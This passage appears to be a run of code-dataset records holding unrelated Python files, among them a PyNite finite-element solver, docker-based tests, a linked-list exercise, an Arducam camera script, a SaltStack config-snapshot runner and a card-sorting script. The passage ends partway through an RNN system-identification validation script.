Direction, w1, w2, x1, x2):\r\n \"\"\"\r\n Adds a member distributed load to the model.\r\n \r\n Parameters\r\n ----------\r\n Member : string\r\n The name of the member the load is being appied to\r\n Direction : {'Fx', 'Fy', 'Fz'}\r\n The direction in which the load is to be applied. Note that\r\n typical beam sign convention is used. Forces acting toward the beam\r\n are positive.\r\n w1 : number\r\n The starting value (magnitude) of the load.\r\n w2 : number\r\n The ending value (magnitude) of the load.\r\n x1 : number\r\n The load's start location along the member's local x-axis.\r\n x2 : number\r\n The load's end location along the member's local x-axis.\r\n \"\"\"\r\n \r\n # Add the distributed load to the member\r\n self.GetMember(Member).DistLoads.append((Direction, w1, w2, x1, x2))\r\n\r\n#%%\r\n def GetNode(self, Name):\r\n \"\"\"\r\n Returns the node with the given name.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n The name of the node to be returned.\r\n \"\"\"\r\n \r\n # Step through each node in the '__Nodes' list\r\n for node in self.__Nodes:\r\n \r\n # Check the name of the node\r\n if node.Name == Name:\r\n \r\n # Return the node of interest\r\n return node\r\n\r\n#%%\r\n def GetMember(self, Name):\r\n \"\"\"\r\n Returns the member with the given name.\r\n \r\n Parameters\r\n ----------\r\n Name : string\r\n The name of the member to be returned.\r\n \"\"\"\r\n \r\n # Step through each member in the '__Members' list\r\n for member in self.__Members:\r\n \r\n # Check the name of the member\r\n if member.Name == Name:\r\n \r\n # Return the member of interest\r\n return member\r\n\r\n#%%\r\n def __Renumber(self):\r\n \"\"\"\r\n Assigns node and member ID numbers to be used internally by the\r\n program. Numbers are assigned according to the order nodes and members\r\n were added to the model.\r\n \r\n \"\"\"\r\n \r\n # Number each node in the model\r\n i = 0\r\n for node in self.__Nodes:\r\n node.ID = i\r\n i += 1\r\n \r\n # Number each member in the model\r\n i = 0\r\n for member in self.__Members:\r\n member.ID = i\r\n i += 1\r\n \r\n#%% \r\n def K(self, Renumber = True):\r\n \"\"\"\r\n Assembles and returns the global stiffness matrix.\r\n \r\n Parameters\r\n ----------\r\n Renumber : boolean\r\n Indicates whether nodes and members should be renumbered prior to\r\n calculating the stiffness matrix. This may be necessary if a model\r\n is being solved for the first time, or if it has been changed since\r\n the last run, potentially creating a gap in the numbering.\r\n \"\"\"\r\n \r\n # Renumber the nodes and members in the model if requested\r\n if Renumber == True:\r\n self.__Renumber()\r\n \r\n # Initialize a zero matrix to hold all the stiffness terms\r\n K = zeros((len(self.__Nodes) * 6, len(self.__Nodes) * 6))\r\n \r\n # Add stiffness terms for each member in the model\r\n for member in self.__Members:\r\n \r\n # Step through each term in the member's stiffness matrix\r\n # 'a' & 'b' below are row/column indices in the member's stiffness matrix\r\n # 'm' & 'n' are corresponding row/column indices in the global stiffness matrix\r\n for a in range(12):\r\n \r\n # Determine if index 'a' is related to the i-node or j-node\r\n if a < 6:\r\n # Find the corresponding index 'm' in the global stiffness matrix\r\n m = member.iNode.ID * 6 + a\r\n else:\r\n # Find the corresponding index 'm' in the global stiffness matrix\r\n m = member.jNode.ID * 6 + (a - 6)\r\n \r\n for b in range(12):\r\n \r\n # Determine if index 'b' is related to the i-node or j-node\r\n if b < 6:\r\n # Find the corresponding index 'n' in the global stiffness matrix\r\n n = member.iNode.ID * 6 + b\r\n else:\r\n # Find the corresponding index 'n' in the global stiffness matrix\r\n n = member.jNode.ID * 6 + (b - 6)\r\n \r\n # Now that 'm' and 'n' are known, place the term in the global stiffness matrix\r\n K.itemset((m, n), K.item((m, n)) + member.K().item((a, b)))\r\n \r\n # Return the global stiffness matrix\r\n return K\r\n \r\n#%% \r\n def FER(self, Renumber = True):\r\n \"\"\"\r\n Assembles and returns the global fixed end reaction vector.\r\n \r\n Parameters\r\n ----------\r\n Renumber : boolean\r\n Indicates whether nodes and members should be renumbered prior to\r\n calculating the fixed end reaction vector. This may be necessary if\r\n a model is being solved for the first time, or if it has been\r\n changed since the last run, potentially creating a gap in the\r\n numbering.\r\n \"\"\"\r\n \r\n # Renumber the nodes and members in the model if requested\r\n if Renumber == True:\r\n self.__Renumber()\r\n \r\n # Initialize a zero vector to hold all the terms\r\n FER = zeros((len(self.__Nodes) * 6, 1))\r\n \r\n # Add terms for each member in the model\r\n for member in self.__Members:\r\n \r\n # Step through each term in the member's fixed end reaction vector\r\n # 'a' below is the row index in the member's fixed end reaction vector\r\n # 'm' below is the corresponding row index in the global fixed end reaction vector\r\n for a in range(12):\r\n \r\n # Determine if index 'a' is related to the i-node or j-node\r\n if a < 6:\r\n # Find the corresponding index 'm' in the global fixed end reaction vector\r\n m = member.iNode.ID * 6 + a\r\n else:\r\n # Find the corresponding index 'm' in the global fixed end reaction vector\r\n m = member.jNode.ID * 6 + (a - 6)\r\n \r\n # Now that 'm' is known, place the term in the global fixed end reaction vector\r\n FER.itemset((m, 0), FER[m, 0] + member.fer()[a, 0])\r\n \r\n # Return the global fixed end reaction vector\r\n return FER\r\n \r\n#%%\r\n def P(self, Renumber = True):\r\n \"\"\"\r\n Assembles and returns the global nodal force vector.\r\n \r\n Parameters\r\n ----------\r\n Renumber : boolean\r\n Indicates whether nodes and members should be renumbered prior to\r\n calculating the fixed end reaction vector. This may be necessary if\r\n a model is being solved for the first time, or if it has been\r\n changed since the last run, potentially creating a gap in the\r\n numbering.\r\n \"\"\"\r\n \r\n # Renumber the nodes and members in the model if requested\r\n if Renumber == True:\r\n self.__Renumber()\r\n \r\n # Initialize a zero vector to hold all the terms\r\n P = zeros((len(self.__Nodes) * 6, 1))\r\n \r\n # Add terms for each node in the model\r\n for node in self.__Nodes:\r\n \r\n # Get the node's ID\r\n ID = node.ID\r\n \r\n # Add the node's loads to the global nodal load vector\r\n for load in node.NodeLoads:\r\n \r\n if load[0] == 'FX':\r\n P.itemset((ID * 6 + 0, 0), P[ID * 6 + 0, 0] + load[1])\r\n elif load[0] == 'FY':\r\n P.itemset((ID * 6 + 1, 0), P[ID * 6 + 1, 0] + load[1])\r\n elif load[0] == 'FZ':\r\n P.itemset((ID * 6 + 2, 0), P[ID * 6 + 2, 0] + load[1])\r\n elif load[0] == 'MX':\r\n P.itemset((ID * 6 + 3, 0), P[ID * 6 + 3, 0] + load[1])\r\n elif load[0] == 'MY':\r\n P.itemset((ID * 6 + 4, 0), P[ID * 6 + 4, 0] + load[1])\r\n elif load[0] == 'MZ':\r\n P.itemset((ID * 6 + 5, 0), P[ID * 6 + 5, 0] + load[1])\r\n \r\n # Return the global nodal force vector\r\n return P\r\n \r\n#%%\r\n def D(self):\r\n \"\"\"\r\n Returns the global displacement vector for the model.\r\n \"\"\"\r\n \r\n # Return the global displacement vector\r\n return self.__D\r\n \r\n#%% \r\n def Analyze(self):\r\n \"\"\"\r\n Analyzes the model.\r\n \"\"\"\r\n \r\n # Get the global stiffness matrix and renumber the nodes & members\r\n # in the process of creating it\r\n K = self.K(True)\r\n \r\n # Get the global fixed end reaction vector\r\n FER = self.FER(False)\r\n \r\n # Get the global nodal force vector\r\n P = self.P(False)\r\n \r\n # Eliminate supported degrees of freedom from each of the matrices/vectors\r\n # Work backwards through the node list so that the relationship between\r\n # the DOF's and node ID's is unnafected by the matrices/vectors\r\n # shrinking\r\n for node in reversed(self.__Nodes):\r\n \r\n if node.SupportRZ == True:\r\n K = delete(K, node.ID * 6 + 5, axis = 0)\r\n K = delete(K, node.ID * 6 + 5, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 5, axis = 0)\r\n P = delete(P, node.ID * 6 + 5, axis = 0)\r\n \r\n if node.SupportRY == True:\r\n K = delete(K, node.ID * 6 + 4, axis = 0)\r\n K = delete(K, node.ID * 6 + 4, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 4, axis = 0)\r\n P = delete(P, node.ID * 6 + 4, axis = 0)\r\n \r\n if node.SupportRX == True:\r\n K = delete(K, node.ID * 6 + 3, axis = 0)\r\n K = delete(K, node.ID * 6 + 3, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 3, axis = 0)\r\n P = delete(P, node.ID * 6 + 3, axis = 0)\r\n \r\n if node.SupportDZ == True:\r\n K = delete(K, node.ID * 6 + 2, axis = 0)\r\n K = delete(K, node.ID * 6 + 2, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 2, axis = 0)\r\n P = delete(P, node.ID * 6 + 2, axis = 0)\r\n \r\n if node.SupportDY == True:\r\n K = delete(K, node.ID * 6 + 1, axis = 0)\r\n K = delete(K, node.ID * 6 + 1, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 1, axis = 0)\r\n P = delete(P, node.ID * 6 + 1, axis = 0)\r\n \r\n if node.SupportDX == True:\r\n K = delete(K, node.ID * 6 + 0, axis = 0)\r\n K = delete(K, node.ID * 6 + 0, axis = 1)\r\n FER = delete(FER, node.ID * 6 + 0, axis = 0)\r\n P = delete(P, node.ID * 6 + 0, axis = 0)\r\n \r\n # Calculate the global displacement vector\r\n self.__D = matmul(inv(K), subtract(P, FER))\r\n \r\n # Save the displacements as a local variable for easier reference below\r\n D = self.__D\r\n \r\n # Expand the global displacement vector to include supported degrees of freedom\r\n # Work forwards through the node list so that the relationship between\r\n # the DOF's and node ID's is unnafected by the vector expanding\r\n for node in self.__Nodes:\r\n if node.SupportDX == True:\r\n D = insert(D, node.ID * 6 + 0, 0, axis = 0)\r\n if node.SupportDY == True:\r\n D = insert(D, node.ID * 6 + 1, 0, axis = 0)\r\n if node.SupportDZ == True:\r\n D = insert(D, node.ID * 6 + 2, 0, axis = 0)\r\n if node.SupportRX == True:\r\n D = insert(D, node.ID * 6 + 3, 0, axis = 0)\r\n if node.SupportRY == True:\r\n D = insert(D, node.ID * 6 + 4, 0, axis = 0)\r\n if node.SupportRZ == True:\r\n D = insert(D, node.ID * 6 + 5, 0, axis = 0)\r\n\r\n # Store the calculated global nodal displacements into each node\r\n for node in self.__Nodes:\r\n node.DX = D.item((node.ID * 6 + 0, 0))\r\n node.DY = D.item((node.ID * 6 + 1, 0))\r\n node.DZ = D.item((node.ID * 6 + 2, 0))\r\n node.RX = D.item((node.ID * 6 + 3, 0))\r\n node.RY = D.item((node.ID * 6 + 4, 0))\r\n node.RZ = D.item((node.ID * 6 + 5, 0))\r\n \r\n # Calculate and store the reactions at each node\r\n for node in self.__Nodes:\r\n \r\n # Sum the member end forces at the node\r\n for member in self.__Members:\r\n \r\n if member.iNode == node:\r\n \r\n node.RxnFX += member.F()[0, 0]\r\n node.RxnFY += member.F()[1, 0]\r\n node.RxnFZ += member.F()[2, 0]\r\n node.RxnMX += member.F()[3, 0]\r\n node.RxnMY += member.F()[4, 0]\r\n node.RxnMZ += member.F()[5, 0]\r\n \r\n elif member.jNode == node:\r\n \r\n node.RxnFX += member.F()[6, 0]\r\n node.RxnFY += member.F()[7, 0]\r\n node.RxnFZ += member.F()[8, 0]\r\n node.RxnMX += member.F()[9, 0]\r\n node.RxnMY += member.F()[10, 0]\r\n node.RxnMZ += member.F()[11, 0]\r\n \r\n # Sum the joint forces at the node\r\n for load in node.NodeLoads:\r\n \r\n if load[0] == \"FX\":\r\n node.RxnFX -= load[1]\r\n elif load[0] == \"FY\":\r\n node.RxnFY -= load[1]\r\n elif load[0] == \"FZ\":\r\n node.RxnFZ -= load[1]\r\n elif load[0] == \"MX\":\r\n node.RxnMX -= load[1]\r\n elif load[0] == \"MY\":\r\n node.RxnMY -= load[1]\r\n elif load[0] == \"MZ\":\r\n node.RxnMZ -= load[1]\r\n \r\n # Segment all members in the model to make member results available\r\n for member in self.__Members:\r\n member.SegmentMember()\r\n\r\n#%% \r\n def Display(self, wireframe=True):\r\n \"\"\"\r\n Displays the members in 3D\r\n\r\n Parameters\r\n ----------\r\n wireframe : boolean\r\n If true, only plot wireframe\r\n \"\"\"\r\n V = Viewer3D()\r\n\r\n for member in self.__Members:\r\n member.Display(V, wireframe)\r\n\r\n V.Run()\r\n\r\n#%% \r\n def DisplayResults(self, result='seq'):\r\n \"\"\"\r\n Displays the members in 3D indicating stress\r\n\r\n Parameters\r\n ----------\r\n result : str\r\n Stress to display - one of: 'seq' (von Mises equivalent), 'sxx' (axial)\r\n \"\"\"\r\n V = Viewer3D()\r\n\r\n for member in self.__Members:\r\n member.DisplayResults(V, result)\r\n\r\n if result == 'seq':\r\n V.ColorBar('Equivalent (von Mises) Stress / Yield Stress',('0','1'))\r\n elif result == 'sxx':\r\n V.ColorBar('Axial Stress / Yield Stress',('-1','1'))\r\n else: # if result == 'txy' or result == 'tzx':\r\n V.ColorBar('Shear Stress / Shear Yield Stress',('-1','1'))\r\n\r\n V.Run(False) # switch off the shader\r\n","sub_path":"PyNite/FEModel3D.py","file_name":"FEModel3D.py","file_ext":"py","file_size_in_byte":26155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239102952","text":"import hashlib\nimport os\nimport shutil\nimport tempfile\n\nimport docker\nimport pytest\n\n\ndef get_file_hash(filepath: str = '') -> str:\n \"\"\"\n Calculates the sha256 hash of a file\n :param filepath: The full path to the file\n :return: The sha256 of the contents of filename\n \"\"\"\n m = hashlib.sha256()\n with open(filepath, 'rb') as f:\n m.update(f.read())\n return m.hexdigest()\n\n\n@pytest.mark.docker\ndef test_container_build():\n \"\"\"\n Build the worker docker image and check the output is\n correct. By default the container will run a sytle transfer on test images\n contained within. Check that the network is still producing the same output\n on the new build.\n :return:\n \"\"\"\n\n image_tag = 'style-transfer-worker'\n client = docker.from_env()\n output_dir = tempfile.mkdtemp()\n\n try:\n client.images.build(path='src/style-transfer-worker/',\n nocache=False,\n tag=image_tag)\n\n client.containers.run(image=image_tag,\n volumes={output_dir: {'bind': '/output/',\n 'mode': 'rw'}})\n\n assert get_file_hash(os.path.join(output_dir, 'output.jpg')) == \\\n '8da8a7c86ce0c33291467ce8490848b731f8a015bc02c2fdeb26ca2af6eda94d'\n\n finally:\n shutil.rmtree(output_dir)\n\n\n@pytest.mark.docker\n@pytest.mark.parametrize(\n \"style_image, content_size, expected\",\n [('/input/wave.jpg', '1024',\n '63aa7243d0025dbdad63f27790b6539c2c9e010eb0198a86f2a3c9ba521e5518'),\n ('/input/wave.jpg', '512',\n '1702bef9e580a5467f9ad3373077feebe8be5099892e05121801cb16ae960c69'),\n ('/input/starry_night.jpg', '1024',\n 'cb2005f2db7b306dbf05f87b388e04375c0a8a3fa1d0e93de91caf45439f9ad0')]\n)\ndef test_custom_styles(style_image, content_size, expected):\n \"\"\"\n Test giving a custom content image, style image, and size\n :return:\n \"\"\"\n\n client = docker.from_env()\n output_dir = tempfile.mkdtemp()\n input_dir = os.path.realpath('tests/resources')\n\n try:\n client.containers.run(image='style-transfer-worker',\n volumes={\n output_dir: {'bind': '/output/',\n 'mode': 'rw'},\n input_dir: {'bind': '/input/',\n 'mode': 'ro'}},\n command=[\"--content-image\", \"/input/kyoto.jpg\",\n \"--style-image\", style_image,\n \"--content-size\", content_size])\n\n assert get_file_hash(os.path.join(output_dir, 'output.jpg')) == \\\n expected\n\n finally:\n shutil.rmtree(output_dir)\n","sub_path":"tests/test_style-transfer-worker.py","file_name":"test_style-transfer-worker.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"216349358","text":"\n\"\"\"\nOdd Even Linked List\n\nGiven a singly linked list, group all odd nodes together followed by the even nodes.\nPlease note here we are talking about the node number and not the value in the nodes.\n\nYou should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.\n\nExample:\nGiven 1->2->3->4->5->NULL,\nreturn 1->3->5->2->4->NULL.\n\nNote:\nThe relative order inside both the even and odd groups should remain as it was in the input. \nThe first node is considered odd, the second node even and so on ...\n\"\"\"\n\n#constructor for a Node of singly linked list\nclass ListNode:\n def __init__(self, data):\n self.data = data\n self.next = None\n\ndef oddEvenList_Helper(head):\n #YOUR CODE GOES HERE\n\n tempOdd=ListNode(0)\n tempEven=ListNode(0)\n\n # create a copy to store the actual values\n # the temp lists get truncated as part of the loop\n oddList=tempOdd\n evenList=tempEven\n \n # loop through the whole linked list\n while (head != None):\n tempOdd.next=head\n tempEven.next=head.next\n tempOdd=tempOdd.next\n tempEven=tempEven.next\n # printList(tempOdd)\n # print(\"\")\n # printList(oddList)\n # print(\"\")\n\n # we start on an odd\n # so pairwise we stop by checking evens\n if (tempEven != None):\n head=head.next.next\n else:\n head=None\n\n # link the two lists together\n tempOdd.next=evenList.next\n return(oddList.next)\n\n # printList(oddList)\n # print(\"\")\n # printList(evenList)\n # oddList=head\n # evenList=head.next\n\n#DO NOT CHANG THIS FUNCTION\ndef oddEvenList(head):\n return oddEvenList_Helper(head)\n\n##def lenList(head):\n## if (head == None):\n## return(0)\n## else:\n## return(1+lenList(head.next))\n \n \ndef printList(head):\n print(head.data,end=\" \")\n if (head.next != None):\n printList(head.next)\n \n\n#test case\ndef main():\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(3)\n head.next.next.next = ListNode(4)\n head.next.next.next.next = ListNode(5)\n head.next.next.next.next.next = ListNode(6)\n head.next.next.next.next.next.next = ListNode(7)\n head = oddEvenList(head)\n printList(head)\n # print (\"Expected result: 1, 3, 5, 2, 4\")\n # print (\"Your result is: \")\n # printList(head)\n # print(lenList(head))\n # print (\"Your result is {}, {}, {}, {}, {}\".format(head.data, head.next.data, head.next.next.data, head.next.next.next.data, head.next.next.next.next.data))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"problem_1/Fellow Codes Go Here/tai_cai.py","file_name":"tai_cai.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"557495887","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom astropy.tests.helper import remote_data\n\nfrom ...skyview import SkyView\n\n\n@remote_data\ndef test_get_image_list():\n urls = SkyView().get_image_list(\n position='Eta Carinae', survey=['Fermi 5', 'HRI', 'DSS'])\n assert len(urls) == 3\n for url in urls:\n assert url.startswith('http://skyview.gsfc.nasa.gov/tempspace/fits/')\n","sub_path":"astroquery/skyview/tests/test_skyview_remote.py","file_name":"test_skyview_remote.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"395035822","text":"import csv \r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom statistics import mean\r\nfrom scipy.stats import gaussian_kde\r\nimport matplotlib.pyplot as plt\r\n\r\nfilename = input('Input filename > ')\r\nfd = open(filename, 'r')\r\nreader = csv.reader(fd, delimiter=',')\r\npoint = []\r\nfor row in tqdm(reader): point.append(np.array(row[2:], dtype='float32'))\r\nfd.close()\r\nlength = len(point)\r\ndist = []\r\nfor i in tqdm(range(length-1)):\r\n for j in range(i+1, length): dist.append(np.linalg.norm(point[i]-point[j]))\r\ndist = np.array(dist)\r\nprint(np.average(dist))\r\n\r\nlimmin = min(np.percentile(x, 0.1) for x in dist)\r\nlimmax = max(np.percentile(x, 99.9) for x in dist)\r\nls = np.linspace(limmin, limmax, 100)\r\nx = dist\r\nkde = gaussian_kde(x)\r\nplt.plot(ls, kde(ls))\r\nplt.grid(which='major',color='#999999',linestyle='--')\r\nplt.legend(loc='upper right', borderaxespad=1)\r\nplt.show()\r\n","sub_path":"caldist.py","file_name":"caldist.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297106096","text":"import arducam_mipicamera as arducam\nimport v4l2 #sudo pip install v4l2\nimport time\nimport numpy as np\nimport cv2 #sudo apt-get install python-opencv\nimport math\ndef align_down(size, align):\n return (size & ~((align)-1))\n\ndef align_up(size, align):\n return align_down(size + align - 1, align)\n\n# All register stuff is pulled from https://github.com/ArduCAM/ArduCAM_USB_Camera_Shield/commit/1a5ddf36ba80ed7d5a449c2c3a971363df340c91\ndef set_exposure_ms(camera, t):\n #exp = int(math.floor(t * 1000*1000 / (1e9 * 904 / 80000000)))\n #camera.write_sensor_reg(0x3501, (exp & 0xFF00) >> 8)\n #camera.write_sensor_reg(0x3502, (exp & 0x00FF) >> 0)\n camera.set_control(v4l2.V4L2_CID_EXPOSURE, t*10)\n print(\"Exposure set to %.1f ms\" % t)\n\ndef set_gain_db(camera, g):\n camera.write_sensor_reg(0x3508, int(g) & 0x001F)\n print(\"0x3508: 0x%08x\" % (fine_gain))\n\ndef set_analog_gain(camera, g):\n coarse_gain = int(math.floor(g / 100))\n fine_gain = int(math.floor((g / 100) % 1 * 100))\n camera.write_sensor_reg(0x3508, coarse_gain)\n camera.write_sensor_reg(0x3509, fine_gain)\n print(\"0x3508: 0x%08x, 0x3509: 0x%08x\" % (coarse_gain, fine_gain))\n\ndef set_fps(camera, fps):\n vts = int(math.floor(80000000 / (936 * fps)))\n camera.write_sensor_reg(0x380E, (vts & 0xFF00) >>8)\n camera.write_sensor_reg(0x380F, (vts & 0x00FF) >>0)\n print(\"0x380E: 0x%08x, 0x380F: 0x%08x\" % ((vts & 0xFF00) >>8, \n (vts & 0x0FF)>>0))\n\ndef set_controls(camera):\n\n try:\n #camera.software_auto_exposure(enable = True)\n #exp = int(math.floor(exposure_us * 1000 / (1e9 * 904 / 80000000)))\n #print(\"Exposure reg val: %d\" % exp)\n #camera.write_sensor_reg(0x3501, (exp & 0xFF00) >> 8)\n #camera.write_sensor_reg(0x3502, (exp & 0x00FF) >> 0)\n set_exposure_ms(camera,10)\n except Exception as e:\n print(e)\nif __name__ == \"__main__\":\n outfldr = \"out\"\n try:\n camera = arducam.mipi_camera()\n print(\"Open camera...\")\n camera.init_camera()\n camera.set_mode(6) # chose a camera mode which yields raw10 pixel format, see output of list_format utility\n fmt = camera.get_format()\n width = fmt.get(\"width\")\n height = fmt.get(\"height\")\n print(\"Current resolution is {w}x{h}\".format(w=width, h=height))\n\n set_controls(camera)\n set_fps(camera, 1)\n set_analog_gain(camera, 1000)\n set_exposure_ms(camera, 10)\n\n \n time.sleep(1)\n i = 0\n camera.start_preview(fullscreen = False, window = (0, 0, 1600, 1300))\n time.sleep(10)\n # print(\"Stop preview...\")\n camera.stop_preview()\n print(\"Close camera...\")\n camera.close_camera()\n except Exception as e:\n print(e)\n","sub_path":"RPI/python/ov2311_preview.py","file_name":"ov2311_preview.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458238138","text":"\r\nimport salt.client\r\nimport sys\r\nimport datetime\r\nimport os\r\nimport re\r\n\r\n\r\ndef _filter_lines(config, filters):\r\n out_lines = []\r\n compiled_filters = [re.compile(i) for i in filters]\r\n for l in config.split('\\n'):\r\n filter_line = False\r\n for f in compiled_filters:\r\n if f.match(l):\r\n filter_line = True\r\n if not filter_line:\r\n out_lines.append(l)\r\n return '\\n'.join(out_lines)\r\n\r\n\r\ndef snap(target, name=None):\r\n backup_dir = '/srv/salt/snapshots'\r\n if not os.path.exists(backup_dir):\r\n os.makedirs(backup_dir)\r\n\r\n output = {'snapshots': {}, 'failed':{}}\r\n\r\n #use same timestamp for all files\r\n timestamp = datetime.datetime.utcnow().replace(\r\n microsecond=0).isoformat().replace(':', '')\r\n\r\n local = salt.client.LocalClient()\r\n result = local.cmd(\r\n target,\r\n 'net.config', [],\r\n tgt_type='compound',\r\n kwarg={'source': 'running'})\r\n \r\n for dev, val in result.items():\r\n if name is None:\r\n dst = '{}/{}_{}.conf'.format(backup_dir, dev, timestamp)\r\n else:\r\n dst = '{}/{}_{}.conf'.format(backup_dir, dev, name)\r\n\r\n with open(dst, 'w+') as f:\r\n try:\r\n running_conf = val['out']['running']\r\n except:\r\n output['failed'][dev] = val\r\n continue\r\n\r\n filtered = _filter_lines(running_conf, [\r\n '^Building configuration\\.\\.\\.$',\r\n '^Current configuration\\s*:\\s*\\d+ bytes$'\r\n ])\r\n f.write(filtered)\r\n output['snapshots'][dev] = dst\r\n\r\n return output\r\n","sub_path":"salt/runners/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"75640683","text":"import random\n\ndeck =[]\nsuits=[\"♠\",\"♥\",\"♦\",\"♣\"]\ncards=[\"A \",\"2 \",\"3 \",\"4 \",\"5 \",\"6 \",\"7 \",\"8 \",\"9 \",\"10\",\"J \",\"Q \",\"K \"]\n\ndef Shuffle(array):\n for a in range(len(array)-2):\n g=random.randint(a,(len(array)-1))\n b=array[a]\n array[a]=array[g]\n array[g]=b\n return(array)\ndef num(string):\n num=0\n for i in range(len(suits)):\n if suits[i] in string:\n num+=i*14\n for j in range(len(cards)):\n if cards[j] in string:\n num+=j\n return(num)\ndef bubbleSort(arr):\n n = len(arr)\n # Traverse through all array elements\n for i in range(n):\n \n # Last i elements are already in place\n for j in range(0, n-i-1):\n \n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n if num(arr[j]) > num(arr[j+1]) :\n arr[j], arr[j+1] = arr[j+1], arr[j]\ndef selection_sort(nums):\n # This value of i corresponds to how many values were sorted\n for i in range(len(nums)):\n # We assume that the first item of the unsorted segment is the smallest\n lowest_value_index = i\n # This loop iterates over the unsorted items\n for j in range(i + 1, len(nums)):\n if num(nums[j]) < num(nums[lowest_value_index]):\n lowest_value_index = j\n # Swap values of the lowest unsorted element with the first unsorted\n # element\n nums[i], nums[lowest_value_index] = nums[lowest_value_index], nums[i]\n\nfor i in suits:\n for j in cards:\n deck.append(f\"{j} of {i}\")\nfor i in range(10):\n deck=Shuffle(deck)\n \nfor d in deck:\n print(d)\nprint(\"now Sort\")\nselection_sort(deck)\nfor d in deck:\n print(d)","sub_path":"Cards.py","file_name":"Cards.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"339355306","text":"#Project 4 - wordFinder\n#Section: 15\n#Name: Angelina Quach\n#Instructor: Sussan Einakian\n# Due date: 25 February 2016\n\nfrom funcs import *\ndef main():\n puzzle = get_puzzle() #asks user for their 100 character long string.\n words_list = get_words() #asks user for their words of interest to search for.\n final_list =[] #Establish an empty list.\n for word in words_list: #Traverses list of user inputted words and looks for it in all directions.\n final_list = search_puzzle(puzzle, word, final_list) \n print_puzzle(puzzle) #once all of the words in the words_list are searched for, print out the puzzle and print out where they were found.\n print \n print_output(final_list) \n\nmain()\n\n","sub_path":"wordFinder.py","file_name":"wordFinder.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239424558","text":"\n\nfrom xai.brain.wordbase.verbs._irk import _IRK\n\n#calss header\nclass _IRKS(_IRK, ):\n\tdef __init__(self,): \n\t\t_IRK.__init__(self)\n\t\tself.name = \"IRKS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"irk\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_irks.py","file_name":"_irks.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"488368060","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 31 15:07:39 2020\n\n@author: RileyBallachay\n\"\"\"\nfrom Signal import Signal\nfrom Model import Model\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport matplotlib.transforms as transforms\nimport time\nimport os\n\n# These constants are also defined in the Signal module \n# Don't change here unless you also change them there\nNUMTRIALS = 1000\nbatchSize = 16\nplots = 5\n\nvalPath = '/Users/RileyBallachay/Documents/Fifth Year/RNNSystemIdentification/Model Validation/'\nmodel_paths = [f.path for f in os.scandir(valPath) if f.is_dir()]\n\ninDims = range(1,2)\noutDims = range(1,2)\n\n\ndef confidence_ellipse(x, y, ax, n_std=3.0, facecolor='none', **kwargs):\n \"\"\"\n Create a plot of the covariance confidence ellipse of *x* and *y*.\n\n Parameters\n ----------\n x, y : array-like, shape (n, )\n Input data.\n\n ax : matplotlib.axes.Axes\n The axes object to draw the ellipse into.\n\n n_std : float\n The number of standard deviations to determine the ellipse's radiuses.\n\n **kwargs\n Forwarded to `~matplotlib.patches.Ellipse`\n\n Returns\n -------\n matplotlib.patches.Ellipse\n \"\"\"\n if x.size != y.size:\n raise ValueError(\"x and y must be the same size\")\n\n cov = np.cov(x, y)\n pearson = cov[0, 1]/np.sqrt(cov[0, 0] * cov[1, 1])\n # Using a special case to obtain the eigenvalues of this\n # two-dimensionl dataset.\n ell_radius_x = np.sqrt(1 + pearson)\n ell_radius_y = np.sqrt(1 - pearson)\n ellipse = Ellipse((0, 0), width=ell_radius_x * 2, height=ell_radius_y * 2,\n facecolor=facecolor, **kwargs)\n\n # Calculating the stdandard deviation of x from\n # the squareroot of the variance and multiplying\n # with the given number of standard deviations.\n scale_x = np.sqrt(cov[0, 0]) * n_std\n mean_x = np.mean(x)\n\n # calculating the stdandard deviation of y ...\n scale_y = np.sqrt(cov[1, 1]) * n_std\n mean_y = np.mean(y)\n\n transf = transforms.Affine2D() \\\n .rotate_deg(45) \\\n .scale(scale_x, scale_y) \\\n .translate(mean_x, mean_y)\n\n ellipse.set_transform(transf + ax.transData)\n return ax.add_patch(ellipse)\n\n\n\nfor (inDimension,outDimension) in zip(inDims,outDims): \n name ='MIMO ' + str(inDimension) + 'x' + str(outDimension)\n path = valPath + name + '/Checkpoints/'\n \n start_time = time.time()\n numTrials=int(NUMTRIALS/(inDimension*outDimension))\n sig = 